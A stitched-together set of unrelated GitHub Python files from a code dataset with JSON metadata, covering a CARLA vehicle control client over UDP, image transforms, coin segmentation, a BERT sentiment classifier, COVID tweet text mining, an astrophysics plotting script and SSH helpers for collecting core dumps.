print(USERNAME,response.status_code,response.text)\n if response.status_code==204:\n key.get(\"channels_done\").get(\"username\").append(USERNAME)\n save()\nsave()","repo_name":"flolep2607/youtube_bck","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9114188707","text":"#!/usr/bin/env python\n\n# ==============================================================================\n# -- find carla module ---------------------------------------------------------\n# ==============================================================================\n\n\nimport glob\nimport os\nimport sys\n\ntry:\n sys.path.append(glob.glob(os.path.join(sys.path[0],'../PythonAPI/carla/dist/carla-*%d.%d-%s.egg' % (\n sys.version_info.major,\n sys.version_info.minor,\n 'win-amd64' if os.name == 'nt' else 'linux-x86_64')))[0])\nexcept IndexError:\n pass\n\nimport carla\n\nfrom carla import ColorConverter as cc\n\nimport argparse\nimport collections\nimport datetime\nimport logging\nimport math\nimport random\nimport re\nimport weakref\nimport time\nimport socket\nimport struct\nimport json\nimport threading\n\nfrom common import load_CAN_ID\ncarlaIDMap = {}\ncarlaIDMapRPT = {}\n\ntry:\n import numpy as np\nexcept ImportError:\n raise RuntimeError('cannot import numpy, make sure numpy package is installed')\n\n\nclass World(object):\n def __init__(self, carla_world, args):\n self.world = carla_world\n try:\n self.map = self.world.get_map()\n except RuntimeError as error:\n print('RuntimeError: {}'.format(error))\n print(' The server could not send the OpenDRIVE (.xodr) file:')\n print(' Make sure it exists, has the same name of your town, and is correct.')\n sys.exit(1)\n self.sensors = None\n self.actor = None\n self.control = None\n\n def tick(self):\n self.sensors.tick()\n\n def getActor(self, id):\n print(\"Actor ID set\", id)\n self.actor = self.world.get_actor(id)\n if self.actor:\n try:\n self.control = self.actor.get_control()\n except AttributeError:\n print(\"Actor ID\", id, \"is not controllable\")\n self.actor = None\n else:\n print(\"Nothing exists for ID\", id)\n \n def get_control(self):\n return self.control\n \n def get_player(self):\n return self.actor\n\t\t\n# TODO how bad is this? makes code real simple but global; I think this is ok just for a simple reader / writer thread\n# handle_vid_scok thread listens on the socket and updates these variables\n# if the new_id flag has been set \ng_new_vehicle_id_available = False # global if there is a new id on the socket; set to True in sock handler set False after used\ng_new_id = 0 # the new id gotten\ng_kill = False\ndef handle_vid_sock(sock, initId):\n prevId = initId\n while True:\n try:\n viddata = sock.recv(1024)\n except socket.timeout:\n viddata = None\n\n if viddata is not None:\n if viddata == b'kill':\n global g_kill\n g_kill = True\n continue\n vid = int(viddata, 16)\n global g_new_vehicle_id_available\n global g_new_id\n # if the id has changed or we have not finished changing the last id\n if prevId != vid and not g_new_vehicle_id_available:\n g_new_id = vid\n prevId = vid\n g_new_vehicle_id_available = True\n viddata = None\n\ndef input_loop(args):\n world = None\n sensors = None\n\n try:\n client = carla.Client(args.carla_host, args.carla_port)\n client.set_timeout(2.0)\n\n try:\n world = World(client.get_world(), args)\n except RuntimeError as e:\n print(\"No response from CARLA server:\", e)\n quit()\n \n control = world.get_control()\n player = world.get_player()\n frontLights = carla.VehicleLightState.NONE\n turnLights = carla.VehicleLightState.NONE\n brakeLights = carla.VehicleLightState.NONE\n currentLight = carla.VehicleLightState.NONE\n\n\n data = ''\n with open(os.path.join(sys.path[0], args.can_id), 'r') as file:\n data = file.read()\n testDict = json.loads(data)\n data = ''\n\n vidsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n try:\n vidsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n except AttributeError:\n pass\n vidsock.setblocking(True)\n vidsock.bind((args.vid_ip, args.vid_port))\n vidsock.settimeout(1)\n\n if args.actor_id:\n world.getActor(args.actor_id)\n control = world.get_control()\n player = world.get_player()\n vid = args.actor_id\n \n while control is None:\n try:\n viddata = vidsock.recv(1024)\n except socket.timeout:\n viddata = None\n\n if viddata is not None:\n if viddata == b'kill':\n print(\"Got kill message; exitting\")\n quit()\n vid = int(viddata, 16)\n world.getActor(vid)\n control = world.get_control()\n player = world.get_player()\n viddata = None\n\n vid_thread = threading.Thread(target = handle_vid_sock, args = (vidsock, vid))\n vid_thread.setDaemon(True) # kill this when parent dies\n vid_thread.start()\n\n external_gears = [\"P\", \"R\", \"N\", \"D\", \"L\"]\n external_gear_idx = 0\n last_gear = 0\n last_ignition = 0\n ignition_on = False\n\n if isinstance(control, carla.VehicleControl):\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n try:\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n except AttributeError:\n pass\n sock.setblocking(True)\n sock.bind((args.rec_ip, args.rec_port))\n sock.settimeout(1)\n\n control.manual_gear_shift = 1\n physCtrl = player.get_physics_control()\n maxGear = len(physCtrl.forward_gears) - 1\n lastGearData = 0\n while True:\n if g_kill:\n print(\"Got kill message; exitting\")\n quit()\n global g_new_vehicle_id_available\n if g_new_vehicle_id_available:\n world.getActor(g_new_id)\n control = world.get_control()\n control.manual_gear_shift = 1\n player = world.get_player()\n g_new_vehicle_id_available = False\n\n try:\n data = sock.recv(1024)\n except socket.timeout:\n data = None\n\n if data is None:\n continue\n\n can = data.split(b\" \") #id , datasize, data\n \n id = int(can[0], 16)\n dataSize = int(can[1], 16) #don't need datasize as we know always 8 for SLCAN\n data = int(can[2], 16)\n \n #logging.debug(\"Receive id: 0x%x, size: %x, data: %x\", id, dataSize, data)\n \n # TODO range on these same betwen SLCAN and EXU? I think so but basing EXU off of trial and error\n if (id == carlaIDMap['throttle']):\n control.throttle = data / 0x3FF # scale to 0 - 1\n elif (id == carlaIDMap['steer']):\n # 2's compliment convert on 2 bytes\n if (data & (1 << (16 - 1))) != 0:\n data = data - (1 << 16)\n control.steer = data / 0x1FE # scale to -1 - 1\n elif (id == carlaIDMap['brake']):\n control.brake = data / 0x3FF # scale to 0 - 1\n if control.brake > 0: # TODO cheating a little bit doing this instead of based on EXU message\n brakeLights |= carla.VehicleLightState.Brake\n else: \n brakeLights &= carla.VehicleLightState.All ^ carla.VehicleLightState.Brake\n # in mode 1 for all other values looking for command for just gear want report \n #elif id == 119: #in mode 1 109 and 119 are the same?\n elif (id == carlaIDMap['gear']):\n if last_gear != data:\n if data == 1: # gear up : L towards P\n external_gear_idx = max(0, external_gear_idx - 1) # can't go past P\n elif data == 2: # gear down : P towards L\n external_gear_idx = min(len(external_gears) - 1, external_gear_idx + 1)\n last_gear = data\n data = external_gear_idx + 1\n # comment out above if applying directly\n #print(\"Inc:\", last_gear, \"gear:\", external_gears[external_gear_idx])\n control.reverse = False\n if data == 1: # P\n control.gear = 0\n elif data == 2: # R\n control.reverse = True\n control.gear = -1\n elif data == 3: # N\n control.gear = 0\n elif data == 4: # D TODO? should switch off manual shift for this and L?\n control.gear = 3\n elif data == 5:\n control.gear = 1 # L\n else:\n logging.debug(\"Bad value for gear %d\", data)\n\n if control.reverse:\n brakeLights |= carla.VehicleLightState.Reverse\n else:\n brakeLights &= carla.VehicleLightState.All ^ carla.VehicleLightState.Reverse\n # https://carla.readthedocs.io/en/latest/python_api/#carlavehiclelightstate\n elif (id == carlaIDMap['lightFront']):\n #print(\"light front \", hex(id), \":\", data)\n frontLights = carla.VehicleLightState.NONE\n if data & 1:\n frontLights |= carla.VehicleLightState.Position\n if data & 2:\n frontLights |= carla.VehicleLightState.LowBeam\n if data & 4:\n frontLights |= carla.VehicleLightState.HighBeam\n #logging.error(\"Unknown front light state: \" + str(data))\n elif (id == carlaIDMap['lightTurn']):\n #print(\"light turn \", id, \":\", data)\n if data == 0:\n turnLights = carla.VehicleLightState.NONE\n elif data == 1:\n turnLights = carla.VehicleLightState.LeftBlinker \n elif data == 2:\n turnLights = carla.VehicleLightState.RightBlinker \n elif data & 4 != 0:\n turnLights = carla.VehicleLightState.LeftBlinker | carla.VehicleLightState.RightBlinker \n elif (id == carlaIDMap['hand_brake']):\n control.hand_brake = data==1\n #elif (id == carlaIDMap['ignition']):\n # if last_ignition == 0 and data == 1:\n # ignition_on = not ignition_on\n # last_ignition = data\n elif (id == carlaIDMap['engine']):\n ignition_on = data\n #else:\n # logging.error(f\"Unknown ID {id}\")\n currentLight = frontLights | turnLights | brakeLights\n player.set_light_state(carla.VehicleLightState(currentLight))\n\n if not ignition_on:\n control.throttle = 0\n\n if player.get_control().gear == 1 and (external_gear_idx != 4):\n if control.throttle != 1.0:\n control.throttle += 0.000001\n else:\n control.throttle -= 0.000001\n\n player.apply_control(control)\n\n else:\n print(\"This actor id is not a vehicle\\n\")\n\n finally:\n print(\"Exiting\")\n\n\n# ==============================================================================\n# -- main() --------------------------------------------------------------------\n# ==============================================================================\n\n\ndef main():\n argparser = argparse.ArgumentParser(\n description='CARLA Manual Control Client')\n argparser.add_argument(\n '-v', '--verbose',\n action='store_true',\n dest='debug',\n help='print debug information')\n argparser.add_argument(\n '--rec_ip',\n default='127.0.0.1',\n help='Receive IP (default: 127.0.0.1)')\n argparser.add_argument(\n '--rec_port',\n metavar='P',\n default=3001,\n type=int,\n help='TCP port to listen to (default: 3001)')\n argparser.add_argument(\n '--vid_ip',\n default='127.0.0.1',\n help='Vehicle ID Receive IP (default: 127.0.0.1)')\n argparser.add_argument(\n '--vid_port',\n default=3002,\n type=int,\n help='TCP port to listen to (default: 3002)')\n argparser.add_argument(\n '--id',\n dest='actor_id',\n type=int,\n help='[Optional] intial value to use for actor ID. Will be overwritten by IDs incoming on UDP connection on vid_ip:vid_port'\n )\n argparser.add_argument(\n '--carla_host',\n metavar='H',\n default='127.0.0.1',\n help='IP of the host server (default: 127.0.0.1)')\n argparser.add_argument(\n '--carla_port',\n metavar='P',\n default=2000,\n type=int,\n help='TCP port to listen to (default: 2000)')\n argparser.add_argument(\n '--can_id',\n default='CAN_ID.json',\n help='Path to file containing CAN_IDs for messages (default CAN_ID.json in current directory)'\n )\n argparser.add_argument(\n '--use_ECU_Tester',\n action='store_true',\n default=False,\n help='Wheter to receive command messages (default) or report.'\n )\n argparser.add_argument(\n '--mode',\n default=1,\n type = int,\n choices=[1],\n help='Mode to opearate in see main.py for full details.'\n )\n args = argparser.parse_args()\n\n log_level = logging.DEBUG if args.debug else logging.INFO\n logging.basicConfig(format='%(levelname)s: %(message)s', level=log_level)\n\n logging.info('listening to server %s:%s and %s:%s', args.rec_ip, args.rec_port, args.vid_ip, args.vid_port)\n\n global carlaIDMap, carlaIDMapRPT\n # load the CAN-IDs with report tag for variables we care about\n # (want to read status not change it)\n canType = 'report' if args.use_ECU_Tester else 'command'\n carlaIDMap = load_CAN_ID(canType, args.can_id)\n # bit messy but need the engine report in all isntances\n if 'engine' not in carlaIDMap:\n carlaIDMapRPT = load_CAN_ID('report', args.can_id)\n carlaIDMap['engine'] = carlaIDMapRPT['engine']\n\n try:\n input_loop(args)\n\n except KeyboardInterrupt:\n print('\\nCancelled by user. Bye!')\n\n\nif __name__ == '__main__':\n\n main()\n","repo_name":"pasta-auto/CARLA-PASTA","sub_path":"data_in_can_udp.py","file_name":"data_in_can_udp.py","file_ext":"py","file_size_in_byte":15162,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"5663107091","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport math\nimg = cv2.imread('GeometricTransformation/red_panda.jpg')\n\ndef translate(image, tx, ty):\n img_t = np.zeros_like(image)\n img_t[:-ty,:-tx] = img[ty:,tx:]\n\n return img_t\n\ndef scale(image, sw, sh):\n if(sw<0 or sw<0):\n raise Exception(\"Sorry, no numbers below zero\")\n\n img_s = np.zeros_like(image)\n img_s = img[::sw,::sh]\n \n return img_s\n\ndef rotation(image, degree):\n img_r = np.zeros_like(image)\n rads = math.radians(degree)\n\n original_width, original_height, channel = image.shape\n\n midx,midy = (original_width//2, original_height//2)\n\n for i in range(original_width):\n for j in range(original_height):\n x= (i-midx)*math.cos(rads)+(j-midy)*math.sin(rads)\n y= -(i-midx)*math.sin(rads)+(j-midy)*math.cos(rads)\n\n x=round(x)+midx \n y=round(y)+midy \n\n if (x>=0 and y>=0 and x binarizado\nplt.imshow(mascara, cmap='gray');\n\nfrom skimage import morphology\nfrom skimage.morphology import disk\n\nmascara_limpia = morphology.remove_small_objects(mascara)\nmascara_limpia = ~morphology.remove_small_objects(~mascara)\n\nplt.imshow(mascara_limpia, cmap='gray');\n\n#plt.imshow(coins, cmap='gray');\n\nmascara_de_fondo = ~mascara_limpia\n\nimg.setflags(write=1)\nimg[mascara_de_fondo] = 0\ngris[mascara_de_fondo] = 0\nplt.imshow(img);\n\nfrom scipy import ndimage as ndi\nfrom matplotlib.colors import ListedColormap\n\ndistancia_imagen = ndi.distance_transform_edt(mascara_de_fondo)\nprint('transformada de distancia:', distancia_imagen.shape, distancia_imagen.dtype)\n\nfrom skimage import feature, measure\n\ndef imshow_overlay(im, mask, alpha=0.5, color='red', **kwargs):\n \"\"\"Show semi-transparent red mask over an image\"\"\"\n mask = mask > 0\n mask = np.ma.masked_where(~mask, mask) \n plt.imshow(im, **kwargs)\n plt.imshow(mask, alpha=alpha, cmap=ListedColormap([color]))\n\n\ndef watershed_segmentation(mask):\n distancia_imagen = ndi.distance_transform_edt(mask)\n peaks = feature.peak_local_max(distancia_imagen, indices=True)\n peaks_im = np.zeros(distancia_imagen.shape, dtype=bool)#matriz de zeros de la mascara\n for row, col in peaks:\n peaks_im[row, col] = 1\n marcadores_imagen = measure.label(peaks_im)\n etiqueta_imagen = morphology.watershed(-distancia_imagen, marcadores_imagen, mask=mascara_limpia)\n return etiqueta_imagen\n\n\netiqueta_moneda = watershed_segmentation(mascara_limpia)\n\nplt.imshow(etiqueta_moneda)\n\nregions = measure.regionprops(etiqueta_moneda)\n\nplt.imshow(img)\n\nfor region in regions:\n y, x = region.centroid\n area = region.area\n area_str = '%.1f' % (area/100)\n\nmin_5 = 61000\nmax_5=62000\nmin_10 = 70000\nmax_2=51000\nmin_2=48000\nmax_1=42000\nmin_1=39000\n\n\nnum_5 = 0\nnum_10 = 0\nnum_deruido = 0\nnum_2 = 0\nnum_1=0\n\n\n\nfor region in regions:\n y, x = region.centroid\n area = region.area\n if area >= min_5 and area<= max_5:\n coin_name = '5'\n num_5 += 1\n elif area >= min_10:\n coin_name = '10'\n num_10 += 1\n elif area >= min_2 and area<=max_2:\n coin_name = '2'\n num_2 += 1\n elif area >= min_1 and area<=max_1:\n coin_name = '1'\n num_1 += 1\n else:\n coin_name = ''\n num_deruido += 1\n plt.text(x, y, coin_name, ha='center', va='center') # ha, va = horizontal alignment,vertical aligment\n \nvalue = (10*num_10 + 5*num_5 + 2*num_2+1*num_1)\nmonedas=(num_10+num_5+num_2+num_1)\nprint ('%i :10 pesos, %i: 5 pesos, %i :2 pesos, %i :1 peso' %(num_10, num_5, num_2, num_1))\nprint ('Tienes $%.2f pesos' % value)\nprint('Numero de monedas: ',monedas)\n\nplt.show()","repo_name":"amilcaralex97/moneda","sub_path":"prueba.py","file_name":"prueba.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22368488517","text":"from kivymd.uix.dialog import MDInputDialog\r\n\r\nclass SearchPopupMenu(MDInputDialog):\r\n title = 'Add Website URL'\r\n text_button_ok = 'Add'\r\n\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.size = [.9, .3]\r\n self.events_callback = self.callback\r\n\r\n def callback(self, *args):\r\n website_url = self.text_field.text\r\n print(website_url)\r\n","repo_name":"mrtmendoza/python-application-prototype-1","sub_path":"searchpopupmenu.py","file_name":"searchpopupmenu.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10420705568","text":"import datetime\nfrom absl import flags\nimport pytorch_lightning as pl\nimport transformers\nimport torch as th\n#from imblearn.metrics import classification_report_imbalanced\nfrom sklearn.metrics import classification_report\n\n\nflags.DEFINE_integer('batch_size', 16, '')\nflags.DEFINE_float('lr', 1e-5, '')\nflags.DEFINE_float('momentum', .9, '')\nflags.DEFINE_string('model', 'bert-base-uncased', '')\nflags.DEFINE_boolean('multiclass', False, '')\n\nFLAGS = flags.FLAGS\n\nclass BertModel(pl.LightningModule):\n def __init__(self):\n super().__init__()\n self.batch_size = FLAGS.batch_size\n self.counter_epoch = 0\n self.conc = None\n self.tokenizer = transformers.BertTokenizer.from_pretrained(FLAGS.model)\n self.model_type = FLAGS.model\n self.multiclass = FLAGS.multiclass\n self.lr = FLAGS.lr\n if self.multiclass:\n self.model = transformers.BertForSequenceClassification.from_pretrained(FLAGS.model, num_labels=3)\n self.loss = th.nn.BCEWithLogitsLoss(reduction=\"none\")\n else:\n self.model = transformers.BertForSequenceClassification.from_pretrained(FLAGS.model)\n self.loss = th.nn.CrossEntropyLoss(reduction=\"none\")\n\n def forward(self, input_ids):\n mask = (input_ids != 0).float()\n logits = self.model(input_ids, mask).logits\n #for i in range(len(input_ids)):\n # print(self.tokenizer.decode(input_ids[i]))\n # print(logits[i].argmax(-1))\n # print(logits[i])\n return logits\n\n def training_step(self, batch, batch_idx):\n print(self.lr)\n if self.multiclass:\n batch['label'] = batch['label'].type(th.FloatTensor).to(device = 'cuda')\n logits = self.forward(batch['input_ids'])\n loss = self.loss(logits, batch['label']).mean()\n #self.log('training_loss', loss, on_step=True, on_epoch=True, prog_bar=True, logger=True)\n return loss\n\n def validation_step(self, batch, batch_idx):\n y = batch['label']\n if self.multiclass:\n batch['label'] = batch['label'].type(th.FloatTensor).to(device = 'cuda')\n logits = self.forward(batch['input_ids'])\n loss = self.loss(logits,batch['label'])\n preds = logits.argmax(-1)\n return {'loss': loss, 'pred': preds, 'target': y}\n\n def validation_epoch_end(self, outputs):\n loss = th.cat([o['loss'] for o in outputs], 0).mean()\n preds = th.cat([o['pred'] for o in outputs], 0)\n print(preds)\n targets = th.cat([o['target'] for o in outputs], 0)\n print(targets)\n if self.multiclass:\n targets = targets.argmax(-1)\n report = classification_report(targets.cpu(), preds.cpu())\n print(report)\n print(loss)\n with open('./Ergebnisse/%s/training/%s_epoch_no_%s.txt' % (\n FLAGS.concept, datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"), self.counter_epoch),\n 'w') as outfile:\n outfile.write(str(report))\n report = classification_report(targets.cpu(), preds.cpu(), output_dict=True)\n self.counter_epoch += 1\n self.log = {'val_loss': loss}\n return self.log\n\n def test_step(self, batch, batch_idx):\n\n if self.multiclass:\n logits = self.forward(batch['input_ids'])\n pred_negative = sum(logits.argmax(-1) == 0)\n pred_neutral = sum(logits.argmax(-1) == 1)\n pred_positive = sum(logits.argmax(-1) == 2)\n return {'pred_negative': pred_negative, 'pred_neutral': pred_neutral, 'pred_positive': pred_positive, 'logits': logits}\n else:\n logits = self.forward(batch['input_ids'])\n pred = sum(logits.argmax(-1) == 1)\n print(pred)\n return {'logits': logits, 'pred': pred}\n\n def test_epoch_end(self, outputs):\n print(outputs)\n if self.multiclass:\n logits = [o['logits'] for o in outputs]\n conc = logits[0]\n for logit in logits[1:]:\n conc= th.cat((conc,logit), 0)\n self.conc = conc\n predictions = {}\n pred_negative = [o['pred_negative'] for o in outputs]\n print(pred_negative)\n pred_negative = th.sum(th.stack(pred_negative))\n print(pred_negative)\n predictions['negative'] = pred_negative\n pred_neutral = [o['pred_neutral'] for o in outputs]\n pred_neutral = th.sum(th.stack(pred_neutral))\n predictions['neutral'] = pred_neutral\n pred_positive = [o['pred_positive'] for o in outputs]\n pred_positive = th.sum(th.stack(pred_positive))\n predictions['positive'] = pred_positive\n highest_prediction = max(predictions, key=predictions.get)\n self.log = {'test_pred': highest_prediction}\n return self.log\n else:\n logits = [o['logits'] for o in outputs]\n pred = [o['pred'] for o in outputs]\n conc = logits[0]\n for logit in logits[1:]:\n conc= th.cat((conc,logit), 0)\n pred = th.sum(th.stack(pred)) \n pred = pred / len(self.ds_test)\n self.log = {'test_pred': pred}\n self.conc = conc\n return self.log\n\n\n\n def train_dataloader(self):\n return th.utils.data.DataLoader(\n self.ds_train,\n batch_size=self.batch_size,\n drop_last=True,\n shuffle=True,\n num_workers=4\n )\n\n def val_dataloader(self):\n return th.utils.data.DataLoader(\n self.ds_val,\n batch_size=self.batch_size,\n drop_last=False,\n shuffle=False,\n num_workers=4\n )\n\n def test_dataloader(self):\n return th.utils.data.DataLoader(\n self.ds_test,\n batch_size=self.batch_size,\n drop_last=False,\n shuffle=False,\n num_workers=4\n )\n\n def configure_optimizers(self):\n print(self.lr)\n return th.optim.Adam(\n self.parameters(),\n lr=(self.lr or self.learning_rate)\n )","repo_name":"porzelaines/Masterarbeit","sub_path":"Masterarbeit/BertModel.py","file_name":"BertModel.py","file_ext":"py","file_size_in_byte":6241,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"13992237320","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport time\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\n\n\ndef task1(df):\n \"\"\"\n Apply operations specified in question 1.\n\n Parameters:\n df (Dataframe):The dataframe which is to be applied operations\n\n Returns:\n The dataframe after applying operations\"\"\"\n\n # get all sentiments\n sentiments_column = df['Sentiment']\n # get unique sentiment values\n possible_sentiments = set(sentiments_column)\n print('all possible sentiment values: ' + str(possible_sentiments))\n\n # get values and number of occurrences of a given value, then sort it and\n # get second most occurring one\n second_most_popular_sent = sentiments_column.value_counts() \\\n .sort_values(ascending=False).index[1]\n print('second most popular sentiment: ' + str(second_most_popular_sent))\n\n # filter df to retrieve samples with Extremely Positive sentiment only\n df_extremely_positive = df[df['Sentiment'] == 'Extremely Positive']\n # group by date, sort it and retrieve the most popular one\n date_with_most_extremely_positive_sent = df_extremely_positive \\\n .groupby(['TweetAt']).count().sort_values(\n ascending=False, by=['Sentiment']).index[0]\n print('date with most extremely positive sentiment: '\n + str(date_with_most_extremely_positive_sent))\n\n # convert to lower case\n df['OriginalTweet'] = df['OriginalTweet'].str.lower()\n\n # replace non alphabetical characters\n df['OriginalTweet'] = df['OriginalTweet'] \\\n .replace('[^0-9a-zA-Z]+', ' ', regex=True)\n\n # ensure that the words of a message are separated by a single whitespace\n df['OriginalTweet'] = df['OriginalTweet'].replace(' {2,}', ' ', regex=True)\n\n return df\n\n\ndef count_occurrences(dict, words):\n \"\"\"\n Counts number of occurrences of words.\n\n Parameters: dict (dict): The dict which is used to store information about\n occurrences of a given words. Each word is added to this dict as a key,\n where value corresponds to number of occurrences\n words (Iterable): collection of words to count\n \"\"\"\n\n for word in words:\n if word in dict:\n dict[word] = dict[word] + 1\n else:\n dict[word] = 0\n\n\ndef task2(df):\n \"\"\"\n Apply operations specified in question 2\n\n Parameters:\n df (Dataframe):The dataframe which is to be applied operations\n\n Returns:\n Dataframe after applying operations and dict with most frequent words\n \"\"\"\n\n # add TokenizedTweets column and insert split words\n df.insert(5, 'TokenizedTweets', df['OriginalTweet'].str.split())\n\n # count total number of words with repetitions\n total_words_count = df['TokenizedTweets'].str.len().sum()\n print('total number of words: ' + str(total_words_count))\n\n # number of all distinct words\n unique_words = set()\n df['TokenizedTweets'].apply(\n lambda x: [unique_words.add(word) for word in x])\n print('number of unique words: ' + str(len(unique_words)))\n\n # the 10 most frequent words in the corpus\n n_most_frequent_words(df, 10)\n\n stop_words = set(open('./data/text_data/stopwords.txt').read().splitlines())\n\n # remove stopwords or words with ≤ 2 characters\n df['TokenizedTweets'] = df['TokenizedTweets'].apply(\n lambda x: [word for word in x if\n len(word) > 2 and word not in stop_words])\n\n total_words_count = df['TokenizedTweets'].str.len().sum()\n print('total number of words after removing stop words: ' + str(\n total_words_count))\n\n # the 10 most frequent words in the corpus\n dict_most_frequent_words = n_most_frequent_words(df, 10)\n\n return df, dict_most_frequent_words\n\n\ndef n_most_frequent_words(df, n):\n \"\"\"\n Calculate words frequency\n\n Parameters: df (Dataframe): The dataframe with column TokenizedTweets for\n which counting is applied n (int): Number of most frequent words to be\n printed. For example n=10 will result in printing results for 10 most\n frequent words. This is however, independent of dict that is returned,\n which is not limited by this parameter.\n\n Returns:\n dictionary of words frequency\n \"\"\"\n words_freq_dict = {}\n np.vectorize(count_occurrences)(words_freq_dict, df['TokenizedTweets'])\n\n most_frequent_words = sorted(words_freq_dict.items(), key=lambda x: x[1]\n , reverse=True)\n print('the 10 most frequent words: ' + str(most_frequent_words[0:n]))\n\n return words_freq_dict\n\n\ndef task3(words_frequencies_dict, df_size):\n \"\"\"\n Create line chart of words frequency and saves it to file\n\n Parameters: df_size (int): size of the dataframe. Equivalent of number of\n documents in dataset for which we plot the chart words_frequencies_dict (dict)\n\n Returns:\n None\n \"\"\"\n # create new dict to obtain fraction of documents in a which a word appears\n words_fraction_appearing = {k: v / df_size for (k, v) in\n words_frequencies_dict.items()}\n\n # plot chart after sorting\n plt.plot(sorted(words_fraction_appearing.values(), key=lambda x: x,\n reverse=False))\n # save image to file\n plt.savefig('outputs/most_frequent.jpg')\n\n\ndef task4(df):\n \"\"\"\n Create MultinomialNB that is to trained on dataframe and print its error rate.\n\n Parameters: df (Dataframe): The dataframe used to training the model. Need to\n have column 'OriginalTweet' that is used as sample data and 'Sentiment'\n column which contains target value\n\n Returns:\n None\n \"\"\"\n # create count vectorizer\n cv = CountVectorizer()\n\n # transform data using the count vectorizer\n X = cv.fit_transform(np.array(df['OriginalTweet']))\n # transform target data to numpy array\n y = np.array(df['Sentiment'])\n\n # create MultinomialNB\n clf = MultinomialNB()\n # train the model\n clf.fit(X, y)\n\n print('error rate: ' + str(1 - clf.score(X, y)))\n\n\nif __name__ == '__main__':\n time_total = time.time()\n\n # load the data to dataframe\n df = pd.read_csv('data/text_data/Corona_NLP_train.csv', encoding='latin-1')\n\n # task 1\n df_converted = task1(df)\n\n # task 2\n df_tokenized, dict_most_frequent_words = task2(df_converted)\n\n # # task 3\n task3(dict_most_frequent_words, len(df_tokenized))\n\n # # task 4\n task4(df_tokenized)\n\n print(\"---code executed in %s seconds ---\" % (time.time() - time_total))\n","repo_name":"Drakles/data_mining_cw2","sub_path":"text_mining.py","file_name":"text_mining.py","file_ext":"py","file_size_in_byte":6570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30398297154","text":"import ares\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nc_f=np.arange(0.1, 1, 0.1)\r\nfig1 = plt.figure()\r\nfor i in range(len(c_f)):\r\n sim = ares.simulations.Global21cm(clumping_factor = c_f[i])\r\n sim.run()\r\n plt.plot(sim.history['z'], sim.history['dTb'], label = \"CF= \"+str(round(c_f[i],1)))\r\n\r\nplt.title(r\"clumping_factor\")\r\nplt.xlabel(r\"$z$\")\r\nplt.ylabel(r\"$\\delta T_b$\")\r\nplt.legend(loc='lower right')\r\nplt.xlim(5,35)\r\nplt.savefig(\"clumping_factor.png\")","repo_name":"aryana-haghjoo/My-Project","sub_path":"code_history/ares_scripts/sample/clumping_factor.py","file_name":"clumping_factor.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70434808082","text":"from pathlib import PurePath\n\nfrom client.utils.osutils import ssh\n\n\ndef find_dumps(tv_ip):\n find_files = r\"find /mnt/ -name *.core\"\n\n try:\n client = ssh.ssh_connect(tv_ip)\n _, files, _ = client.exec_command(find_files, timeout=10)\n except:\n raise\n else:\n files = files.read().decode()\n finally:\n client.close()\n\n return files.split()\n\n\ndef clear_dumps(tv_ip, path):\n if isinstance(path, PurePath):\n path = path.as_posix()\n\n cmd = r\"rm -rf {}\".format(path)\n\n try:\n client = ssh.ssh_connect(tv_ip)\n _, stdout, _ = client.exec_command(cmd, timeout=10)\n except:\n raise\n else:\n stdout = stdout.read().decode()\n finally:\n client.close()\n\n return stdout\n\n\ndef get_dumps(tv_ip, remote_path_file, local_path_file):\n if isinstance(remote_path_file, PurePath):\n remote_path_file = remote_path_file.as_posix()\n if isinstance(local_path_file, PurePath):\n local_path_file = local_path_file.as_posix()\n\n try:\n ssh.get_file(tv_ip, remote_path_file, local_path_file)\n except:\n raise\n","repo_name":"papachappa/client","sub_path":"client/utils/tv/nonsoap_commands/dumps.py","file_name":"dumps.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19808227212","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\n\nmy_data = pd.read_csv('word2vec.txt', sep=',')\n\nX = my_data.iloc[:,0:].values\nmin_max_scaler = preprocessing.MinMaxScaler()\nx_scaled = min_max_scaler.fit_transform(X)\ndf_normalized = pd.DataFrame(x_scaled)\n\ndf_normalized.to_csv('dataset.txt', header=None, index=None, sep=',', mode='a')\n\n\n\nTraining_X = df_normalized.iloc[0:5221,:].values\nTesting_X = df_normalized.iloc[5281:5331,:].values\nTraining_Y = df_normalized.iloc[5331:10611,:].values\nTesting_Y = df_normalized.iloc[10611:10662,:].values\n\n\ndf1=pd.DataFrame(data=Training_X)\ndf2=pd.DataFrame(data=Testing_X)\ndf3=pd.DataFrame(data=Training_Y)\ndf4=pd.DataFrame(data=Testing_Y)\n\nframes = [df1, df3]\nTraining = pd.concat(frames)\n\nprint(Training.shape)\n\nframes1 = [df2, df4]\nTesting = pd.concat(frames1)\nprint(Testing.shape)\n\n\nTraining.to_csv('Training.txt', header=None, index=None, sep=',', mode='a')\nTesting.to_csv('Testing.txt', header=None, index=None, sep=',', 